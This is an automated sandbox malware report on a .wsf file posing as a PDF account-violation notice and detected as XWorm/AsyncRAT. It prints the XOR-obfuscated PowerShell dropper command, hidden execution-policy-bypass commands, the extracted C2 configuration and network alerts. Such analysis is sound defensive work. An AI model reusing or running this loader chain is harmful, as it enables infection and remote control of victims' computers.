Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
reported_account_violation-pdf-67223451.wsf

Overview

General Information

Sample name:reported_account_violation-pdf-67223451.wsf
Analysis ID:1517939
MD5:fb43dcd8581a7cded732e93b9b6b61a1
SHA1:f61761d095c2b193ce07529ac13ad6d622b64699
SHA256:d3036ee6b4f2717e05a9a2b62bba456dd5b4c0f353517676318a609976f0b5a5
Tags:AsyncRATRATwsfuser-abuse_ch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected XWorm
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6432 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\reported_account_violation-pdf-67223451.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121{23I59C6j118,16,59B121{101C122,12k27f126{99k126!122I12C117O121j9O115O17C28,20O121!101j122B12!27k26!126f99I126I122I12f27C117B121C59C29f10j126k16k59k10!112O9B121f101k122I14!31C29I99I121O59{28B29k18j121k101C122O38!38f126B99C126,122!14{31{29f117C121j23f59O16{121!101B122k12I17C126{99!126!122!38{38k117O121,10O119k112k26O17f9C16I18k17f121,101C122C36j36,99I121B17j30O110,118j120O118C121O121I54!42B42C46C45O100I113,113C46{63k45I42f59I112j59{59f113I44I113O47B58!43{13f24B113O110f121f121C119f121j112f12{59O14C18C31O29k59C118!121{17B30j110B118k120k121{114O121k31B26C13j10f12,23!16{25B121C119{101k55!59O38{118,122!12,27!26O117C122I12j17B117{122C36k36f119'.SPLit( ',!kjI{CBOf')|% { [cHaR] ( $_ -BXOR 0x5E ) } )) ; powershell $ReDrO" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7300 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "MSFT_ScheduledTask (TaskName = "MicroSoftVisualsUpdater", TaskPath = "\")" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • wscript.exe (PID: 1196 cmdline: C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 4208 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7200 cmdline: cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 7216 cmdline: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • RegSvcs.exe (PID: 7624 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 7940 cmdline: C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7992 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8036 cmdline: cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 8052 cmdline: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • RegSvcs.exe (PID: 7300 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
{"C2 url": ["ALBANIAH3CKER.WORK.GD"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
SourceRuleDescriptionAuthorStrings
00000013.00000002.2547031959.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000013.00000002.2547031959.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x6aa8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x6b45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x6c5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x691a:$cnc4: POST / HTTP/1.1
    0000000C.00000002.4155550243.00000000028D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      Process Memory Space: RegSvcs.exe PID: 7624JoeSecurity_XWormYara detected XWormJoe Security
        Process Memory Space: RegSvcs.exe PID: 7300JoeSecurity_XWormYara detected XWormJoe Security
          SourceRuleDescriptionAuthorStrings
          19.2.RegSvcs.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            19.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x6ca8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x6d45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x6e5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x6b1a:$cnc4: POST / HTTP/1.1

            System Summary

            barindex
            Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121{23I59C6j118,16,59B121{101C122,12k27f126{99k126!122I12C117O121j9O115O17C28,20O121!101j122B12!27k26!126f99I126I122I12f27C117B121C59C29f10j126k16k59k10!112O9B121f101k122I14!31C29I99I121O59{28B29k18j121k101C122O38!38f126B99C126,122!14{31{29f117C121j23f59O16{121!101B122k12I17C126{99!126!122!38{38k117O121,10O119k112k26O17f9C16I18k17f121,101C122C36j36,99I121B17j30O110,118j120O118C121O121I54!42B42C46C45O100I113,113C46{63k45I42f59I112j59{59f113I44I113O47B58!43{13f24B113O110f121f121C119f121j112f12{59O14C18C31O29k59C118!121{17B30j110B118k120k121{114O121k31B26C13j10f12,23!16{25B121C119{101k55!59O38{118,122!12,27!26O117C122I12j17B117{122C36k36f119'.SPLit( ',!kjI{CBOf')|% { [cHaR] ( $_ -BXOR 0x5E ) } )) ; powershell $ReDrO" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121{23I59C6j118,16,59B121{101C122,12k27f126{99k126!122I12C117O121j9O115O17C28,20O121!101j122B12!27k26!126f99I126I122I12f27C117B121C59C29f10j126k16k59k10!112O9B121f101k122I14!31C29I99I121O59{28B29k18j121k101C122O38!38f126B99C126,122!14{31{29f117C121j23f59O16{121!101B122k12I17C126{99!126!122!38{38k117O121,10O119k112k26O17f9C16I18k17f121,101C122C36j36,99I121B17j30O110,118j120O118C121O121I54!42B42C46C45O100I113,113C46{63k45I42f59I112j59{59f113I44I113O47B58!43{13f24B113O110f121f121C119f121j112f12{59O14C18C31O29k59C118!121{17B30j110B118k120k121{114O121k31B26C13j10f12,23!16{25B121C119{101k55!59O38{118,122!12,27!26O117C122I12j17B117{122C36k36f119'.SPLit( ',!kjI{CBOf')|% { [cHaR] ( $_ -BXOR 0x5E ) } )) ; powershell $ReDrO" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\reported_account_violation-pdf-67223451.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6432, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121{23I59C6j118,16,59B121{101C122,12k27f126{99k126!122I12C117O121j9O115O17C28,20O121!101j122B12!27k26!126f99I126I122I12f27C117B121C59C29f10j126k16k59k10!112O9B121f101k122I14!31C29I99I121O59{28B29k18j121k101C122O38!38f126B99C126,122!14{31{29f117C121j23f59O16{121!101B122k12I17C126{99!126!122!38{38k117O121,10O119k112k26O17f9C16I18k17f121,101C122C36j36,99I121B17j30O110,118j120O118C121O121I54!42B42C46C45O100I113,113C46{63k45I42f59I112j59{59f113I44I113O47B58!43{13f24B113O110f121f121C119f121j112f12{59O14C18C31O29k59C118!121{17B30j110B118k120k121{114O121k31B26C13j10f12,23!16{25B121C119{101k55!59O38{118,122!12,27!26O117C122I12j17B117{122C36k36f119'.SPLit( ',!kjI{C
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121{23I59C6j118,16,59B121{101C122,12k27f126{99k126!122I12C117O121j9O115O17C28,20O121!101j122B12!27k26!126f99I126I122I12f27C117B121C59C29f10j126k16k59k10!112O9B121f101k122I14!31C29I99I121O59{28B29k18j121k101C122O38!38f126B99C126,122!14{31{29f117C121j23f59O16{121!101B122k12I17C126{99!126!122!38{38k117O121,10O119k112k26O17f9C16I18k17f121,101C122C36j36,99I121B17j30O110,118j120O118C121O121I54!42B42C46C45O100I113,113C46{63k45I42f59I112j59{59f113I44I113O47B58!43{13f24B113O110f121f121C119f121j112f12{59O14C18C31O29k59C118!121{17B30j110B118k120k121{114O121k31B26C13j10f12,23!16{25B121C119{101k55!59O38{118,122!12,27!26O117C122I12j17B117{122C36k36f119'.SPLit( ',!kjI{CBOf')|% { [cHaR] ( $_ -BXOR 0x5E ) } )) ; powershell $ReDrO" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121{23I59C6j118,16,59B121{101C122,12k27f126{99k126!122I12C117O121j9O115O17C28,20O121!101j122B12!27k26!126f99I126I122I12f27C117B121C59C29f10j126k16k59k10!112O9B121f101k122I14!31C29I99I121O59{28B29k18j121k101C122O38!38f126B99C126,122!14{31{29f117C121j23f59O16{121!101B122k12I17C126{99!126!122!38{38k117O121,10O119k112k26O17f9C16I18k17f121,101C122C36j36,99I121B17j30O110,118j120O118C121O121I54!42B42C46C45O100I113,113C46{63k45I42f59I112j59{59f113I44I113O47B58!43{13f24B113O110f121f121C119f121j112f12{59O14C18C31O29k59C118!121{17B30j110B118k120k121{114O121k31B26C13j10f12,23!16{25B121C119{101k55!59O38{118,122!12,27!26O117C122I12j17B117{122C36k36f119'.SPLit( ',!kjI{CBOf')|% { [cHaR] ( $_ -BXOR 0x5E ) } )) ; powershell $ReDrO" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\reported_account_violation-pdf-67223451.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6432, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121{23I59C6j118,16,59B121{101C122,12k27f126{99k126!122I12C117O121j9O115O17C28,20O121!101j122B12!27k26!126f99I126I122I12f27C117B121C59C29f10j126k16k59k10!112O9B121f101k122I14!31C29I99I121O59{28B29k18j121k101C122O38!38f126B99C126,122!14{31{29f117C121j23f59O16{121!101B122k12I17C126{99!126!122!38{38k117O121,10O119k112k26O17f9C16I18k17f121,101C122C36j36,99I121B17j30O110,118j120O118C121O121I54!42B42C46C45O100I113,113C46{63k45I42f59I112j59{59f113I44I113O47B58!43{13f24B113O110f121f121C119f121j112f12{59O14C18C31O29k59C118!121{17B30j110B118k120k121{114O121k31B26C13j10f12,23!16{25B121C119{101k55!59O38{118,122!12,27!26O117C122I12j17B117{122C36k36f119'.SPLit( ',!kjI{C
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" , CommandLine: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" , CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7200, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" , ProcessId: 7216, ProcessName: powershell.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs" , ProcessId: 1196, ProcessName: wscript.exe
            Source: Process startedAuthor: frack113: Data: Command: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" , CommandLine: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" , CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7200, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" , ProcessId: 7216, ProcessName: powershell.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\reported_account_violation-pdf-67223451.wsf", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\reported_account_violation-pdf-67223451.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\reported_account_violation-pdf-67223451.wsf", ProcessId: 6432, ProcessName: wscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121{23I59C6j118,16,59B121{101C122,12k27f126{99k126!122I12C117O121j9O115O17C28,20O121!101j122B12!27k26!126f99I126I122I12f27C117B121C59C29f10j126k16k59k10!112O9B121f101k122I14!31C29I99I121O59{28B29k18j121k101C122O38!38f126B99C126,122!14{31{29f117C121j23f59O16{121!101B122k12I17C126{99!126!122!38{38k117O121,10O119k112k26O17f9C16I18k17f121,101C122C36j36,99I121B17j30O110,118j120O118C121O121I54!42B42C46C45O100I113,113C46{63k45I42f59I112j59{59f113I44I113O47B58!43{13f24B113O110f121f121C119f121j112f12{59O14C18C31O29k59C118!121{17B30j110B118k120k121{114O121k31B26C13j10f12,23!16{25B121C119{101k55!59O38{118,122!12,27!26O117C122I12j17B117{122C36k36f119'.SPLit( ',!kjI{CBOf')|% { [cHaR] ( $_ -BXOR 0x5E ) } )) ; powershell $ReDrO" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121{23I59C6j118,16,59B121{101C122,12k27f126{99k126!122I12C117O121j9O115O17C28,20O121!101j122B12!27k26!126f99I126I122I12f27C117B121C59C29f10j126k16k59k10!112O9B121f101k122I14!31C29I99I121O59{28B29k18j121k101C122O38!38f126B99C126,122!14{31{29f117C121j23f59O16{121!101B122k12I17C126{99!126!122!38{38k117O121,10O119k112k26O17f9C16I18k17f121,101C122C36j36,99I121B17j30O110,118j120O118C121O121I54!42B42C46C45O100I113,113C46{63k45I42f59I112j59{59f113I44I113O47B58!43{13f24B113O110f121f121C119f121j112f12{59O14C18C31O29k59C118!121{17B30j110B118k120k121{114O121k31B26C13j10f12,23!16{25B121C119{101k55!59O38{118,122!12,27!26O117C122I12j17B117{122C36k36f119'.SPLit( ',!kjI{CBOf')|% { [cHaR] ( $_ -BXOR 0x5E ) } )) ; powershell $ReDrO" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\reported_account_violation-pdf-67223451.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6432, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121{23I59C6j118,16,59B121{101C122,12k27f126{99k126!122I12C117O121j9O115O17C28,20O121!101j122B12!27k26!126f99I126I122I12f27C117B121C59C29f10j126k16k59k10!112O9B121f101k122I14!31C29I99I121O59{28B29k18j121k101C122O38!38f126B99C126,122!14{31{29f117C121j23f59O16{121!101B122k12I17C126{99!126!122!38{38k117O121,10O119k112k26O17f9C16I18k17f121,101C122C36j36,99I121B17j30O110,118j120O118C121O121I54!42B42C46C45O100I113,113C46{63k45I42f59I112j59{59f113I44I113O47B58!43{13f24B113O110f121f121C119f121j112f12{59O14C18C31O29k59C118!121{17B30j110B118k120k121{114O121k31B26C13j10f12,23!16{25B121C119{101k55!59O38{118,122!12,27!26O117C122I12j17B117{122C36k36f119'.SPLit( ',!kjI{C
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121{23I59C6j118,16,59B121{101C122,12k27f126{99k126!122I12C117O121j9O115O17C28,20O121!101j122B12!27k26!126f99I126I122I12f27C117B121C59C29f10j126k16k59k10!112O9B121f101k122I14!31C29I99I121O59{28B29k18j121k101C122O38!38f126B99C126,122!14{31{29f117C121j23f59O16{121!101B122k12I17C126{99!126!122!38{38k117O121,10O119k112k26O17f9C16I18k17f121,101C122C36j36,99I121B17j30O110,118j120O118C121O121I54!42B42C46C45O100I113,113C46{63k45I42f59I112j59{59f113I44I113O47B58!43{13f24B113O110f121f121C119f121j112f12{59O14C18C31O29k59C118!121{17B30j110B118k120k121{114O121k31B26C13j10f12,23!16{25B121C119{101k55!59O38{118,122!12,27!26O117C122I12j17B117{122C36k36f119'.SPLit( ',!kjI{CBOf')|% { [cHaR] ( $_ -BXOR 0x5E ) } )) ; powershell $ReDrO" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121{23I59C6j118,16,59B121{101C122,12k27f126{99k126!122I12C117O121j9O115O17C28,20O121!101j122B12!27k26!126f99I126I122I12f27C117B121C59C29f10j126k16k59k10!112O9B121f101k122I14!31C29I99I121O59{28B29k18j121k101C122O38!38f126B99C126,122!14{31{29f117C121j23f59O16{121!101B122k12I17C126{99!126!122!38{38k117O121,10O119k112k26O17f9C16I18k17f121,101C122C36j36,99I121B17j30O110,118j120O118C121O121I54!42B42C46C45O100I113,113C46{63k45I42f59I112j59{59f113I44I113O47B58!43{13f24B113O110f121f121C119f121j112f12{59O14C18C31O29k59C118!121{17B30j110B118k120k121{114O121k31B26C13j10f12,23!16{25B121C119{101k55!59O38{118,122!12,27!26O117C122I12j17B117{122C36k36f119'.SPLit( ',!kjI{CBOf')|% { [cHaR] ( $_ -BXOR 0x5E ) } )) ; powershell $ReDrO" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\reported_account_violation-pdf-67223451.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6432, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121{23I59C6j118,16,59B121{101C122,12k27f126{99k126!122I12C117O121j9O115O17C28,20O121!101j122B12!27k26!126f99I126I122I12f27C117B121C59C29f10j126k16k59k10!112O9B121f101k122I14!31C29I99I121O59{28B29k18j121k101C122O38!38f126B99C126,122!14{31{29f117C121j23f59O16{121!101B122k12I17C126{99!126!122!38{38k117O121,10O119k112k26O17f9C16I18k17f121,101C122C36j36,99I121B17j30O110,118j120O118C121O121I54!42B42C46C45O100I113,113C46{63k45I42f59I112j59{59f113I44I113O47B58!43{13f24B113O110f121f121C119f121j112f12{59O14C18C31O29k59C118!121{17B30j110B118k120k121{114O121k31B26C13j10f12,23!16{25B121C119{101k55!59O38{118,122!12,27!26O117C122I12j17B117{122C36k36f119'.SPLit( ',!kjI{C
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T09:27:28.851237+020028410751Malware Command and Control Activity Detected192.168.2.449730188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T09:28:02.698762+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:28:04.018372+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:28:14.657329+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:28:25.301072+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:28:32.951908+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:28:32.951973+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:28:35.939132+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:28:46.579768+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:28:57.437286+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:28:57.439022+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:29:00.615414+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:29:02.698036+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:29:06.691265+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:29:12.344456+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:29:12.731024+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:29:12.896075+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:29:13.939256+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:29:18.313370+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:29:28.954074+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:29:32.359576+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:29:32.720920+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:29:35.235820+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:29:36.313135+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:29:44.547276+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:29:49.741529+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:29:53.797637+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:00.251320+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:02.734763+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:04.507181+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
            2024-09-25T09:30:05.972774+020028528701Malware Command and Control Activity Detected94.198.50.337000192.168.2.463994TCP
